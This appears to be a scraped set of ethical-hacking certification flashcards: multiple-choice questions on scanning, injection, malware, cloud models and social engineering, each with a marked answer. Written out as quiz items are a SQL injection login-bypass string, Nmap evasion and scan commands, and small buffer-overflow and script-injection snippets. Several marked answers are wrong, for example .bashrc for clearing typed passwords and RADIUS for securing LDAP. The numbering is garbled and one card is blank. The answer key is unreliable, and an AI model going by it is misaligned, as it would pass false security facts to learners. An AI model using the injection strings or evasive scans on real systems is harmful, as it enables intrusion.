Risk assessment

A

Remediation ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q
  1. There are multiple cloud deployment options depending on how isolated a customer’s resources are from those
    of other customers. Shared environments share the costs and allow each customer to enjoy lower operations
    expenses. One solution is for a customer to join with a group of users or organizations to share a cloud environment.
    What is this cloud deployment option called?

Hybrid
Public
Community
Private

A

Community ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q
  1. An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all
    the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the
    reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an
    OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and
    malware.
    Which of the following tools must the organization employ to protect its critical infrastructure?

Flowmon
Robotium
IntentFuzzer
BalenaCloud

A

Flowmon ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q
  1. What are common files on a web server that can be misconfigured and provide useful information for a hacker
    such as verbose error messages?

idq. dll
httpd. conf
php. ini
administration. config

A

httpd.conf ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q
  1. To invisibly maintain access to a machine, an attacker utilizes a rootkit that sits undetected in the core
    components of the operating system. What is this type of rootkit an example of?

Hardware rootkit
Kernel rootkit
Hypervisor rootkit
Firmware rootkit

A

Kernel rootkit ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q
  1. Which of the following information security controls creates an appealing isolated environment for hackers to
    prevent them from compromising critical targets while simultaneously gathering information about the hacker?

Intrusion detection system
Honeypot
Botnet
Firewall

A

Honeypot ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q
  1. Sam is working as a system administrator in an organization. He captured the principal characteristics of a
    vulnerability and produced a numerical score to reflect its severity using CVSS v3.0 to properly assess and prioritize
    the organization’s vulnerability management processes. The base score that Sam obtained after performing CVSS
    rating was 4.0.
    What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?

Medium
Critical
High
Low

A

Medium ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q
  1. Bill is a network administrator. He wants to eliminate unencrypted traffic inside his company’s network. He
    decides to setup a SPAN port and capture all traffic to the datacenter. He immediately discovers unencrypted traffic
    in port UDP 161.
    What protocol is this port using and how can he secure that traffic?

It is not necessary to perform any actions, as SNMP is not carrying important information.
RPC and the best practice is to disable RPC completely
SNMP and he should change it to SNMP V2, which is encrypted
SNMP and he should change it to SNMP V3

A

SNMP and he should change it to SNMP V3 ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q
  1. Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web
    server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a few
    countermeasures to secure the accounts on the web server.
    Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

Enable all non-interactive accounts that should exist but do not require interactive login
Enable unused default user accounts created during the installation of an OS
Retain all unused modules and application extensions
Limit the administrator or root-level access to the minimum number of users

A

Limit the administrator or root-level access to the minimum number of users ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q
  1. Jay turns on his home computer to access personal online banking. When he enters the URL www.bank.com, the
    website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When
    he examines the website URL closer, he finds that the site is not secure and the web address appears different.
    What type of attack he is experiencing?

DHCP spoofing
DNS hijacking
ARP cache poisoning
DoS attack

A

DNS hijacking ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q
  1. What would be the fastest way to perform content enumeration on a given web server by using the Gobuster
    tool?

Performing content enumeration using the bruteforce mode and 10 threads
Performing content enumeration using the bruteforce mode and random file extensions
Performing content enumeration using a wordlist
Skipping SSL certificate verification

A

Performing content enumeration using the bruteforce mode and 10 threads ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
87
Q
  1. Ricardo has discovered the username for an application in his target’s environment. As he has a limited amount
    of time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them into a
    list and then feeds that list as an argument into his password-cracking application.
    What type of attack is Ricardo performing?

Dictionary
Brute force
Password spraying
Known plaintext

A

Dictionary ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
88
Q
  1. Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in
    order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls.
    On which of the following ports should Robin run the NSTX tool?

Port 53
Port 50
Port 23
Port 80

A

Port 53 ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
89
Q
  1. Joe works as an IT administrator in an organization and has recently set up a cloud computing service for the
    organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and
    transport services between the organization and the cloud service provider.
    In the NIST cloud deployment reference architecture, under which category does the telecom company fall in the
    above scenario?

Cloud auditor
Cloud carrier
Cloud broker
Cloud consumer

A

Cloud carrier ✓

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
90
Q
  1. Ethical hacker Jane Smith is attempting to perform an SQL injection attack. She wants to test the response time of
    a true or false response and wants to use a second command to determine whether the database will return true or
    false results for user IDs.
    Which two SQL injection types would give her the results she is looking for?

Time-based and union-based
Time-based and boolean-based
Union-based and error-based
Out of band and boolean-based

A

Union-based and error-based ✓

91
Q
  1. What piece of hardware on a computer’s motherboard generates encryption keys and only releases a part of the
    key so that decrypting a disk on a new piece of hardware is not possible?

CPU
GPU
UEFI
TPM

A

TPM ✓

92
Q
  1. A DDoS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web
    infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and
    keeps waiting for the requests to complete.
    Which attack is being described here?

Session splicing
Phlashing
Desynchronization
Slowloris attack

A

Slowloris attack ✓

93
Q
  1. In order to tailor your tests during a web-application scan, you decide to determine which web-server version is
    hosting the application. On using the sV flag with Nmap, you obtain the following response:
    80/tcp open http-proxy Apache Server 7.1.6
    What information-gathering technique does this best describe?

Banner grabbing
Dictionary attack
Brute forcing
WHOIS lookup

A

Banner grabbing ✓

94
Q
  1. What firewall evasion scanning technique make use of a zombie system that has low network activity as well as its
    fragment identification numbers?

Idle scanning
Packet fragmentation scanning
Decoy scanning
Spoof source address scanning

A

Idle scanning ✓

95
Q
  1. Nicolas just found a vulnerability on a public-facing system that is considered a zero-day vulnerability. He sent an
    email to the owner of the public system describing the problem and how the owner can protect themselves from that
    vulnerability. He also sent an email to Microsoft informing them of the problem that their systems are exposed to.
    What type of hacker is Nicolas?

Gray hat
White hat
Black hat
Red hat

A

White hat ✓

96
Q
  1. Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets this organization to perform sophisticated
    attacks and bring down its reputation in the market. To launch the attacks process, he performed DNS footprinting to
    gather information about DNS servers and to identify the hosts connected in the target network. He used an
    automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP
    addresses, DNS records, and network Whois records. He further exploited this information to launch other
    sophisticated attacks.
    What is the tool employed by Gerard in the above scenario?

Bluto
Knative
Towelroot
zANTI

A

Bluto ✓

97
Q
  1. A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since the
    file did nothing when executed, he asks you for help because he suspects that he may have installed a trojan on his
    computer.
    What tests would you perform to determine whether his computer is infected?

You do not check; rather, you immediately restore a previous snapshot of the operating system.
Use netstat and check for outgoing connections to strange IP addresses or domains.
Upload the file to VirusTotal.
Use ExifTool and check for malicious content.

A

Upload the file to VirusTotal. ✓

98
Q
  1. Richard, an attacker, aimed to hack IoT devices connected to a target network. In this process, Richard recorded
    the frequency required to share information between connected devices. After obtaining the frequency, he captured
    the original data when commands were initiated by the connected devices. Once the original data were collected, he
    used free tools such as URH to segregate the command sequence. Subsequently, he started injecting the
    segregated command sequence on the same frequency into the IoT network, which repeats the captured signals of
    the devices.
    What is the type of attack performed by Richard in the above scenario?

Replay attack
Cryptanalysis attack
Side-channel attack
Reconnaissance attack

A

Replay attack ✓

99
Q
  1. Security administrator John Smith has noticed abnormal amounts of traffic coming from local computers at night.
    Upon reviewing, he finds that user data have been exfiltrated by an attacker. AV tools are unable to find any
    malicious software, and the IDS/IPS has not reported on any non-whitelisted programs.
    What type of malware did the attacker use to bypass the company’s application whitelisting?

malware
Logic bomb malware
Zero-day malware
File-less malware

A

File-less malware ✓

100
Q
  1. Judy created a forum. One day, she discovers that a user is posting strange images without writing comments.
    She immediately calls a security expert, who discovers that the following code is hidden behind those images:

document.write(‘<img></img>);

What issue occurred for the users who clicked on the image?

This php file silently executes the code and grabs the user’s session cookie and session ID.
The code injects a new cookie to the browser.
The code is a virus that is attempting to gather the user’s username and password.
The code redirects the user to another site.

A

This php file silently executes the code and grabs the user’s session cookie and session ID. ✓

101
Q
  1. You are a penetration tester and are about to perform a scan on a specific server. The agreement that you
    signed with the client contains the following specific condition for the scan: “The attacker must scan every port on
    the server several times using a set of spoofed source IP addresses.” Suppose that you are using Nmap to perform
    this scan. What flag will you use to satisfy this requirement?

The -f flag
The -g flag
The -A flag
The -D flag

A

The -D flag ✓

102
Q
  1. Heather’s company has decided to use a new customer relationship management tool. After performing the
    appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative
    task that Heather will need to perform is the management of user accounts. The provider will take care of the
    hardware, operating system, and software administration including patching and monitoring. Which of the following is
    this type of solution?

CaaS
PaaS
SaaS
IaaS

A

SaaS ✓

103
Q
104. John is investigating web-application firewall logs and observers that someone is attempting to inject the
following:
char buff[10];
buff[10] = 'a';
What type of attack is this?

XSS
CSRF
Buffer overflow
SQL injection

A

Buffer overflow ✓

104
Q
  1. Attacker Rony installed a rogue access point within an organization’s perimeter and attempted to intrude into its
    internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at
    cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and
    outdated security mechanisms that are open to attack.
    What is the type of vulnerability assessment performed by Johnson in the above scenario?

Distributed assessment
Host-based assessment
Wireless network assessment
Application assessment

A

Host-based assessment ✓

105
Q
  1. Abel, a security professional, conducts penetration testing in his client organization to check for any security
    loopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all the
    DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This led to a
    DoS attack, and as a result, legitimate employees were unable to access the client’s network.
    Which of the following attacks did Abel perform in the above scenario?

Rogue DHCP server attack
DHCP starvation
VLAN hopping
STP attack

A

DHCP starvation ✓

106
Q
  1. John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization.
    In the attack process, the professional hacker installed a scanner on a machine belonging to one of the victims and
    scanned several machines on the same network to identify vulnerabilities to perform further exploitation.
    What is the type of vulnerability assessment tool employed by John in the above scenario?

Cluster scanner
Proxy scanner
Network-based scanner
Agent-based scanner

A

Agent-based scanner ✓

107
Q
  1. What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an
    organization?

The attacker makes a request to the DNS resolver
The attacker forges a reply from the DNS resolver.
The attacker queries a nameserver using the DNS resolver
The attacker uses TCP to poison the DNS resolver

A

The attacker forges a reply from the DNS resolver. ✓

108
Q
  1. You are a penetration tester working to test the user awareness of the employees of the client XYZ. You harvested two
    employees’ emails from some public sources and are creating a client-side backdoor to send it to the employees via email.
    Which stage of the cyber kill chain are you at?

Weaponization
Reconnaissance
Command and control
Exploitation

A

Weaponization ✓

109
Q
  1. Samuel, a professional hacker, monitored and intercepted already established traffic between Bob and a host
    machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine.
    The host machine responded with a packet having an incremented ISN. Consequently, Bob’s connection got hung,
    and Samuel was able to communicate with the host machine on behalf of Bob.
    What is the type of attack performed by Samuel in the above scenario?

Blind hijacking
Forbidden attack
UDP hijacking
TCP/IP hijacking

A

TCP/IP hijacking ✓

110
Q
  1. By performing a penetration test, you gained access under a user account. During the test, you established a
    connection with your own machine via the SMB service and occasionally entered your login and password in
    plaintext.
    Which file do you have to clean to clear the password?

.bashrc
.xsession-log
.profile
.bash_history

A

.bashrc ✓

111
Q
  1. Infecting a system with malware and using phishing to gain credentials to a system or web application are
    examples of which phase of the ethical hacking methodology?

Scanning
Gaining access
Reconnaissance
Maintaining Access

A

Maintaining Access ✓

112
Q
  1. There have been concerns in your network that the wireless network component is not sufficiently secure. You
    perform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that was
    designed to mimic wired encryption.
    What encryption protocol is being used?

WPA
WEP
RADIUS
WPA3

A

WEP ✓

113
Q
  1. Which of the following protocols can be used to secure an LDAP service against anonymous queries?

SSO
NTLM
WPA
RADIUS

A

RADIUS ✓

114
Q
  1. Which type of virus can change its own code and then cipher itself multiple times as it replicates?

Tunneling virus
Encryption virus
Stealth virus
Cavity virus

A

Encryption virus ✓

115
Q
  1. The network users are complaining because their systems are slowing down. Further, every time they attempt to
    go to a website, they receive a series of pop-ups with advertisements. What type of malware have the systems been
    infected with?

Adware
Spyware
Virus
Trojan

A

Adware ✓

116
Q
  1. Steve, an attacker, created a fake profile on a social media website and sent a request to Stella. Stella was
    enthralled by Steve’s profile picture and the description given for his profile, and she initiated a conversation with
    him soon after accepting the request. After a few days, Steve started asking about her company details and
    eventually gathered all the essential information regarding her company.
    What is the social engineering technique Steve employed in the above scenario?

Baiting
Piggybacking
Honey trap
Diversion theft

A

Baiting ✓

117
Q
  1. Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found
    the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team
    from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow
    the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious
    files, which were then used to collect and pass critical information to Johnson’s machine.
    What is the social engineering technique employed by Steve in the above scenario?

Elicitation
Phishing
Quid pro quo
Diversion theft

A

Quid pro quo ✓

118
Q
  1. Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is
    based on Microsoft SQL Server. In the login/password form, you enter the following credentials:
    Username: attack’ or 1=1 –
    Password: 123456
    Based on the above credentials, which of the following SQL commands are you expecting to be executed by the
    server, if there is indeed an SQL injection vulnerability?

select * from Users where UserName = ‘attack’ or 1=1 –’ and UserPassword = ‘123456’
select * from Users where UserName = ‘attack or 1=1 – and UserPassword = ‘123456’
select * from Users where UserName = ‘attack’ or 1=1 – and UserPassword = ‘123456’
select * from Users where UserName = ‘attack’ ‘ or 1=1 – and UserPassword = ‘123456’

A

select * from Users where UserName = ‘attack’ or 1=1 –’ and UserPassword = ‘123456’ ✓

119
Q
  1. Which of the following commands checks for valid users on an SMTP server?

VRFY
RCPT
EXPN
CHK

A

VRFY ✓

120
Q
  1. Consider the following Nmap output:
    Starting Nmap X.XX (http://nmap.org) at XXX-XX-XX XX:XX EDT
    Nmap scan report for 192.168.1.42 Host is up (0.00023s latency).
    Not shown: 932 filtered ports, 56 closed ports
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    25/tcp open smtp
    53/tcp open domain
    80/tcp open http
    110/tcp open pop3
    143/tcp open imap
    443/tcp open https
    465/tcp open smtps
    587/tcp open submission
    993/tcp open imaps
    995/tcp open pop3s
    Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
    What command-line parameter could you use to determine the type and version number of the web server?
  • Pn
  • sV
  • V
  • sS
A

-sV ✓

121
Q
  1. John, a professional hacker, decided to use DNS to perform data exfiltration on a target network. In this process,
    he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique,
    John successfully injected malware to bypass a firewall and maintained communication with the victim machine and
    C&C server.
    What is the technique employed by John to bypass the firewall?

DNSSEC zone walking
DNS enumeration
DNS cache snooping
DNS tunneling method

A

DNS tunneling method ✓

122
Q
  1. A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the
    Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several
    months prior to the intrusion. This is likely a failure in which of the following security processes?

Vendor risk management
Security awareness training
Secure development lifecycle
Patch management

A

Patch management ✓

123
Q
  1. Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After
    establishing the connection with the public computer, Steven enabled iTunes Wi-Fi sync on the computer so that the
    device could continue communication with that computer even after being physically disconnected. Now, Clark gains
    access to Steven’s iPhone through the infected computer and is able to monitor and read all of Steven’s activity on
    the iPhone, even after the device is out of the communication zone.
    Which of the following attacks is performed by Clark in the above scenario?

iOS jailbreaking
Exploiting SS7 vulnerability
Man-in-the-disk attack
iOS trustjacking

A

iOS trustjacking ✓

124
Q
  1. Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the
    legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also
    received many advertisements on his smartphone after installing the app.
    What is the attack performed on Don in the above scenario?

SMS phishing attack
SIM card attack
Clickjacking
Agent Smith attack

A

Agent Smith attack ✓

125
Q
  1. Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the
    target network and determining whether the ports are online and any firewall rule sets are encountered. John
    decided to perform a TCP SYN ping scan on the target network.
    Which of the following Nmap commands must John use to perform the TCP SYN ping scan?

nmap –sn –PO < target IP address >
nmap –sn –PP < target IP address >
nmap –sn –PS < target IP address >
nmap –sn –PA < target IP address >

A

nmap –sn –PS < target IP address > ✓

126
Q

blank

A
127
Q
  1. Mason, a professional hacker, targets an organization and spreads Emotet malware through malicious script. After infecting
    the vi device, Mason further used Emotet to spread the infection across local networks and beyond to compromise as many
    machines as pos In this process, he used a tool, which is a self-extracting RAR file, to retrieve information related to network
    resources such as writable drives.
    What is the tool employed by Mason in the above scenario?

NetPass.exe
Credential enumerator
WebBrowserPassView
Outlook scraper

A

Credential enumerator ✓

128
Q
  1. Which of the following tactics uses malicious code to redirect users’ web traffic?

Pharming
Spear-phishing
Spimming
Phishing

A

Pharming ✓

129
Q
  1. Calvin, a grey-hat hacker, targets a web application that has design flaws in its authentication mechanism. He enumerates
    usernames from the login form of the web application, which requests users to feed data and specifies the incorrect field in case of
    invalid credentials. Later, Calvin uses this information to perform social engineering. Which of the following design flaws in the
    authentication mechanism is exploited by Calvin?

Password reset mechanism
Insecure transmission of credentials
Verbose failure messages
User impersonation

A

Verbose failure messages ✓

130
Q
  1. Jacob works as a system administrator in an organization. He wants to extract the source code of a mobile application and
    disassemble the application to analyze its design flaws. Using this technique, he wants to fix any bugs in the application, discover
    underlying vulnerabilities, and improve defense strategies against attacks. What is the technique used by Jacob
    in the above scenario to improve the security of the mobile application?

App sandboxing
Reverse Engineering
Jailbreaking
Social engineering

A

Reverse Engineering ✓

131
Q
  1. A “Server-Side Includes” attack refers to the exploitation of a web application by injecting scripts in HTML pages or
    executing arbitrary code remotely. Which web-page file type, if it exists on the web server, is a strong indication that the
    server is vulnerable to this kind of attack?

.cms
.html
.stm
.rss

A

.stm ✓

132
Q
  1. An organization decided to harden its security against web-application and web-server attacks. John, a security personnel in
    the organization, employed a security scanner to automate web-application security testing and to guard the organization’s web
    infrastructure against web-application threats. Using that tool, he also wants to detect XSS, directory transversal problems, fault
    injection, SQL injection, attempts to execute commands, and several other attacks. Which
    of the following security scanners will help John perform the above task?

Saleae Logic Analyzer
Syhunt Hybrid
AlienVault® OSSIM™
Cisco ASA

A

Syhunt Hybrid ✓

133
Q
  1. Juliet, a security researcher in an organization, was tasked with checking for the authenticity of images to be used in the
    organization’s magazines. She used these images as a search query and tracked the original source and details of the images,
    which included photographs, profile pictures, and memes. Which of the following footprinting
    techniques did Rachel use to finish her task?

Reverse image search
Advanced image search
Google advanced search
Meta search engines

A

Reverse image search ✓

134
Q
  1. An attacker utilizes a Wi-Fi Pineapple to run an access point with a legitimate-looking SSID for a nearby business in order to
    capture the wireless password. What kind of attack is this?

Phishing attack
MAC spoofing attack
Evil-twin attack
War driving attack

A

Evil-twin attack ✓

135
Q
  1. Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network to
    identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are
    currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?

Passive assessment
Credentialed assessment
External assessment
Internal assessment

A

Passive assessment ✓

136
Q
  1. Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her
    activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and
    trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which of
    the following tools is employed by Clark to create the spoofed email?

Evilginx
Slowloris
PLCinject
PyLoris

A

Evilginx ✓

137
Q
  1. Which of the following Google advanced search operators helps an attacker in gathering information about websites that are
    similar to a specified target URL?

[inurl:]
[info:]
[related:]
[site:]

A

[related:] ✓

138
Q
  1. While performing an Nmap scan against a host, Paola determines the existence of a firewall. In an attempt to determine
    whether the firewall is stateful or stateless, which of the following options would be best to use?
  • sT
  • sF
  • sX
  • sA
A

-sA ✓

139
Q
  1. is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and celebrities who have
    access to confidential and highly valuable information.

Phishing
Vishing
Spear phishing
Whaling

A

Whaling ✓

140
Q
  1. George, an employee of an organization, is attempting to access restricted websites from an official computer. For this
    purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous anonymity for all his
    online activities.Which of the following anonymizers helps George hide his activities?

https: //www.wolframalpha.com
http: //www.guardster.com
https: //www.baidu.com
http: //karmadecay.com

A

http://www.guardster.com ✓

141
Q
  1. Lewis, a professional hacker, targeted the IoT cameras and devices used by a target venture-capital firm. He used an
    information-gathering tool to collect information about the IoT devices connected to a network, open ports and services, and the
    attack surface area. Using this tool, he also generated statistical reports on broad usage patterns and trends. This tool helped
    Lewis continually monitor every reachable server and device on the Internet, further allowing him to exploit these devices in the
    network.Which of the following tools was employed by Lewis in the above scenario?

Lacework
NeuVector
Censys
Wapiti

A

Censys ✓

142
Q
  1. Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in
    the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?

TCP Maimon scan
ACK flag probe scan
UDP scan
ARP ping scan

A

ARP ping scan ✓

143
Q
  1. Tony is a penetration tester tasked with performing a penetration test. After gaining initial access to a target system, he
    finds a list of hashed passwords. Which of the following tools would not be useful for cracking the hashed passwords?

Hashcat
John the Ripper
netcat
THC-Hydra

A

netcat ✓

144
Q
  1. BitLocker encryption has been implemented for all the Windows-based computers in an organization. You are concerned that
    someone might lose their cryptographic key. Therefore, a mechanism was implemented to recover the keys from Active Directory.
    What is this mechanism called in cryptography?

Certificate rollover
Key escrow
Key renewal
Key archival

A

Key archival ✓

145
Q
  1. Larry, a security professional in an organization, has noticed some abnormalities in the user accounts on a web server. To
    thwart evolving attacks, he decided to harden the security of the web server by adopting a few countermeasures to secure the
    accounts on the web server. Which of the following countermeasures must Larry implement to secure the user accounts on the
    web server?

Enable unused default user accounts created during the installation of an OS
Enable all non-interactive accounts that should exist but do not require interactive login
Retain all unused modules and application extensions
Limit the administrator or root-level access to the minimum number of users

A

Limit the administrator or root-level access to the minimum number of users ✓

146
Q
  1. Harry, a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to
    enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available
    servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection.
    What is the APT lifecycle phase that Harry is currently executing?

Preparation
Persistence
Cleanup
Initial intrusion

A

Persistence ✓

147
Q
  1. Leverox Solutions hired Arnold, a security professional, for the threat intelligence process. Arnold collected information about
    specific threats against the organization. From this information, he retrieved contextual information about security events and
    incidents that helped him disclose potential risks and gain insight into attacker methodologies. He collected the information from
    sources such as humans, social media, and chat rooms as well as from events that resulted in cyberattacks. In this process, he
    also prepared a report that includes identified malicious activities, recommended courses of action, and warnings for emerging
    attacks. What is the type of threat intelligence collected by Arnold in the above scenario?

Operational threat intelligence
Tactical threat intelligence
Strategic threat intelligence
Technical threat intelligence

A

Operational threat intelligence ✓

148
Q
  1. A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current
    time from the target host machine. Which of the following Zenmap options must the analyst use to perform the ICMP
    timestamp ping scan?

–PY

  • Pn
  • PU
  • PP
A

-PP ✓

149
Q
  1. Your organization has signed an agreement with a web hosting provider that requires you to take full responsibility of the
    maintenance of the cloud-based resources. Which of the following models covers this?

Infrastructure as a service
Software as a service
Functions as a service
Platform as a service

A

Infrastructure as a service ✓

150
Q
  1. Which of the following types of SQL injection attacks extends the results returned by the original query, enabling attackers to
    run two or more statements if they have the same structure as the original one?

Error-based injection
Union SQL injection
Blind SQL injection
Boolean-based blind SQL injection

A

Union SQL injection ✓

151
Q
  1. Hackers often raise the trust level of a phishing message by modeling the email to look similar to the internal email used by
    the target company. This includes using logos, formatting, and names of the target company. The phishing message will often use
    the name of the company CEO, President, or Managers. The time a hacker spends performing research to locate this information
    about a company is known as?

Reconnaissance
Exploration
Investigation
Enumeration

A

Reconnaissance ✓

152
Q
  1. Alex, a cloud security engineer working in Eyecloud Inc. is tasked with isolating applications from the underlying infrastructure
    and stimulating communication via well- defined channels. For this purpose, he used an open-source technology that helped him in
    developing, packaging, and running applications; further, the technology provides PaaS through OS-level virtualization, delivers
    containerized software packages, and promotes fast software delivery. What is the cloud technology employed by Alex in the above
    scenario?

Docker
Zero trust network
Virtual machine
Serverless computing

A

Docker ✓

153
Q
  1. A penetration tester is performing the footprinting process and is reviewing publicly available information about an
    organization by using the Google search engine. Which of the following advanced operators would allow the pen tester to
    restrict the search to the organization’s web domain?

[allinurl:]
[link:]
[location:]
[site:]

A

[site:] ✓

154
Q
  1. Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent
    threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and identify
    inbound and outbound malicious traffic entering the organization’s network. Which type of threat intelligence is used by Roma to
    secure the internal network?

Strategic threat intelligence
Operational threat intelligence
Technical threat intelligence
Tactical threat intelligence

A

Tactical threat intelligence ✓

155
Q
  1. Mary, a penetration tester, has found password hashes in a client system she managed to breach. She needs to use these
    passwords to continue with the test, but she does not have time to find the passwords that correspond to these hashes. Which type
    of attack can she implement in order to continue?

Pass the ticket
LLMNR/NBT-NS poisoning
Internal monologue attack
Pass the hash

A

Pass the hash ✓

156
Q
  1. Stella, a professional hacker, performs an attack on web services by exploiting a vulnerability that provides additional routing
    information in the SOAP header to support asynchronous communication. This further allows the transmission of web-service
    requests and response messages using different TCP connections. Which of the following attack techniques is
    used by Stella to compromise the web services?

Web services parsing attacks
WS-Address spoofing
XML injection
SOAPAction spoofing

A

WS-Address spoofing ✓

157
Q
  1. Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as
    possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry
    date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with
    social engineering to obtain internal details of its network.What type of footprinting technique is employed by Richard?

Email footprinting
VPN footprinting
Whois footprinting
VoIP footprinting

A

Whois footprinting ✓

158
Q
  1. Which type of malware spreads from one system to another or from one network to another and causes similar types of
    damage as viruses do to the infected system?

Rootkit
Adware
Trojan
Worm

A

Worm ✓

159
Q
  1. You are attempting to run an Nmap port scan on a web server. Which of the following commands would result in a scan of
    common ports with the least amount of noise in order to evade IDS?

nmap -sT -O -T0
nmap -A –host-timeout 99 -T1
nmap -sP -p-65535 -T5
nmap -A – Pn

A

nmap -sT -O -T0 ✓

160
Q
  1. Jane invites her friends Alice and John over for a LAN party. Alice and John access Jane’s wireless network without a
    password. However, Jane has a long, complex password on her router. What attack has likely occurred?

Piggybacking
Wireless sniffing
Evil twin
Wardriving

A

Evil twin ✓

161
Q
  1. John, a professional hacker, targeted CyberSol Inc., an MNC. He decided to discover the IoT devices connected in the target
    network that are using default credentials and are vulnerable to various hijacking attacks. For this purpose, he used an automated
    tool to scan the target network for specific types of IoT devices and detect whether they are using the default,factory-set
    credentials.What is the tool employed by John in the above scenario?

AT&T IoT Platform
IoT Inspector
Azure IoT Central
IoTSeeker

A

IoTSeeker ✓

162
Q
  1. Kate dropped her phone and subsequently encountered an issue with the phone’s internal speaker. Thus, she is using the
    phone’s loudspeaker for phone calls and other activities. Bob, an attacker, takes advantage of this vulnerability and secretly
    exploits the hardware of Kate’s phone so that he can monitor the loudspeaker’s output from data sources such as voice assistants,
    multimedia messages, and audio files by using a malicious app to breach speech privacy. What is the type of attack Bob performed
    on Kate in the above scenario?

SIM card attack
Man-in-the-disk attack
Spearphone attack
aLTEr attack

A

Spearphone attack ✓

163
Q
  1. Bob, a system administrator at TPNQM SA, concluded one day that a DMZ is not needed if he properly configures the firewall
    to allow access just to servers/ports, which can have direct internet access, and block the access to workstations. Bob also
    concluded that DMZ makes sense just when a stateful firewall is available, which is not the case of TPNQM SA. In this context,what
    can you say?

Bob can be right since DMZ does not make sense when combined with stateless firewalls.
Bob is partially right. DMZ does not make sense when a stateless firewall is available.
Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations.
Bob is partially right. He does not need to separate networks if he can create rules by destination IPs, one by
one.

A

Bob is totally wrong. DMZ is always relevant when the company has internet servers and workstations. ✓

164
Q
  1. James is working as an ethical hacker at Technix Solutions. The management ordered James to discover how vulnerable its
    network is towards footprinting attacks. James took the help of an open-source framework for performing automated
    reconnaissance activities. This framework helped James in gathering information using free tools and resources.What is the
    framework used by James to conduct footprinting and reconnaissance activities?

Browser Exploitation Framework
WebSploit Framework
OSINT framework
SpeedPhish Framework

A

OSINT framework ✓

165
Q
166. Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous Authentication
of Equals (SAE) and is therefore resistant to offline dictionary attacks?

ZigBee
WPA2-Enterprise
WPA3
Personal

A

WPA3 ✓

166
Q
  1. To hide the file on a Linux system, you have to start the filename with a specific character.What is the character?

Tilde (~)
Underscore (_)
Exclamation mark (!)
Period (.)

A

Period (.) ✓

167
Q
